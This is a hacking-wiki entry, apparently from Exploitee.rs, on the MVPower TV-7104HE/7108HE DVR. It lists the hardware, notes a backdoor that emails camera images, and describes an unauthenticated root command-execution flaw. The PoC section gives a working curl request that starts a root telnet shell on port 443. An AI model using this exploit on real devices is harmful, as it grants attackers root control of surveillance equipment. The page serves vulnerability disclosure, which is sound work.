MVPower DVR

From Exploitee.rs

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

Mvpower-TV-7104HE-front.jpg

MVPower DVR

MVPower DVR is a HDMI Full 960H H.264 real-time standalone network CCTV Digital Video Recorder available in 4 and 8 channel models (TV-7104HE / TV-7108HE).


Hardware

  • Video System: PAL
  • Video Compression: H.264
  • Video Input: BNC 4 Channel or 8 Channel
  • Video Output: 1 Channel BNC/VGA
  • Storage Interface Type: SATA
  • Max Capacity: Up to 2TB HDD (not included)
  • USB Interface: USB 2.0


Firmware

An unofficial fork of the firmware was identified on GitHub. It has since been removed, however a fork is available.


Teardown

You can find an excellent teardown of the MVPower DVR at labby.co.uk.


Backdoor

It's worth noting that this device contains a known backdoor which sends still images from the connected cameras to an email address assumed to be maintained by the firmware developer - [email protected]


Remote Command Execution

The web interface contains legacy debugging functionality which does not require authentication and allows trivial remote command execution as root. No patch is available.

The first known report of this issue is from Paul Davies from UHF-Satcom in a comment on the labby.co.uk blog in August 2015.

The TV-7104HE and TV-7108HE models are known to be vulnerable, however it's likely that other models are also affected. The vulnerability was successfully exploited in firmware version 1.8.4 115215B9 (Build 2014/11/17).


PoC

# Start the telnet daemon on port 443
curl -i "http://<IP>/shell?telnetd+-l+/bin/sh+-p+443" -H "Connection: Keep-Alive"
# Telnet to the newly started telnet daemon
telnet <IP> 443


Exploits


Gallery


Links